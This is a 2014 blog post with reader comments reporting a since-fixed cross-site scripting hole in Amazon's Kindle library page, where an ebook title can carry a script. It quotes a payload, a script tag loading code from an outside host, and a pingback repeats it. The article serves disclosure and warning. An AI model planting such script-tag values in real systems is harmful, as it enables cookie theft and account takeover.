Your Amazon Account Can be Hacked via a Kindle eBook

Your Amazon Account Can be Hacked via a Kindle eBook Amazon Amazon might not have a security issue at Audible but they do have one on their main website.

Update: And it has been fixed.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the "manage Your Kindle" page - one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to the Amazon account simply by getting his victims to download an ebook which was itself hacked to include a script in the title:

Once an attacker manages to have an e-book (file, document, ...) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim's library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.

I've tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.

Your Amazon Account Can be Hacked via a Kindle eBook Amazon

As a result I would urge caution against buying or downloading ebooks from untrustworthy sources -  for the near future, at least. I expect Amazon will fix this problem shortly - that's what they did when it was first discovered last fall.

No this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue - and more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler's hack still worked.  There's even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you're worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain Javascript)  and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

Nate Hoffelder

View posts by Nate Hoffelder
Nate Hoffelder is the founder and editor of The Digital Reader: He's here to chew bubble gum and fix broken websites, and he is all out of bubble gum. He has been blogging about indie authors since 2010 while learning new tech skills at the drop of a hat. He fixes author sites, and shares what he learns on The Digital Reader's blog. In his spare time, he fosters dogs for A Forever Home, a local rescue group.

24 Comments

  1. […] Article original sur The Digital Reader  […]

    Reply
  2. R15 September, 2014

    To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book, (which I seldom do so). After buying it, I delete the no. It is just always dangerous to save any personal info online.

    Reply
    1. Skeptical21 September, 2014

      ” I don’t provide any real info to Amazon (except my credit card no.)” I applaud your caution, but you should be a bit more realistic about it… For one, you had to give also your name and your billing address, or othewise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even seen your *own* credit card numbers on Amazon.com (go take a look). So if someone “takes over your account”, they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

      Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has “.js” in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.

      Reply
  3. dn16 September, 2014

    Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.

    Reply
  4. […] Ebook as Hacker Tool (The Digital Reader) Hackers have found a way to use ebooks to hack Amazon accounts. It’s an easy-to-fix loophole in Kindle security but scary nonetheless. […]

    Reply
  5. […] a writeup by someone demonstrating the researcher’s proof of concept test on themselves, passing with […]

    Reply
  6. […] was purchased instead of pirated. That’s where the problems like attackers getting access to your Amazon account — which bears your address, and credit card information — come […]

    Reply
  7. Kindle security flaw can be exploited by hidden codes in e-books | Sprestige.com16 September, 2014

    […] Via: The Digital Reader […]

    Reply
  8. […] información | The Digital Reader | B.FL7.DE En Genbeta | Algunos conceptos básicos de seguridad informática que deberías […]

    Reply
  9. McGroarty16 September, 2014

    This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged Http-only. If a cookie is not flagged Http-only, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.

    Reply
  10. […] Read the full story at The Digital Reader. […]

    Reply
  11. […] According to The Digital Reader, a hacker can gain access to your Amazon account by simply getting you to download and ebook file, which itself was hacked to include a script like <script src=”https://www.example.org/script.js“></script&gt; in the title. […]

    Reply
  12. […] your Kindle is vulnerable to hacking by dodgy ebooks. And by “hacking,” I mean, “Your account gets stolen.” Amazon, tell me […]

    Reply
  13. Tom Semple19 September, 2014

    Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.

    Reply
  14. […] Kindle ebooks from dubious sources aka anywhere other than Amazon, watch out. A security researcher has discovered a security hole in the “Manage Your Kindle” page on Amazon’s website that outs […]

    Reply
  15. […] acuerdo con ‘The Digital Reader?, un hacker puede tener acceso a la cuenta de Amazon simplemente si se descarga un archivo de […]

    Reply
  16. Tuesday 16th of September |24 September, 2014

    […] Full Story at The Digital Reader […]

    Reply
  17. […] this happen, and I can also tell you that Benjamin Daniel Mussler, the security researcher who found the security hole on Amazon.com, has also tested this at my request and saw it with his own […]

    Reply
  18. […] in that article he also references an Amazon vulnerability, that was closed, opened again when Amazon made a site update, and then subsequently closed again, […]

    Reply
  19. […] Your Amazon Account Can Be Hacked Via a Kindle eBook, via author and heckuva guy Nigel Blackwell. […]

    Reply
  20. […] ‘walled garden’ (Zittrain 2008). In reality, hackers are able to surpass these boundaries. A flaw was found in Amazon’s walled garden through the ‘Manage Your Kindle’ page which enables the hacker to […]

    Reply
  21. […] (via Digital Reader) […]

    Reply
  22. […] “Your Amazon Account Can be Hacked via a Kindle eBook” on The Digital Reader […]

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Scroll to top
%d bloggers like this: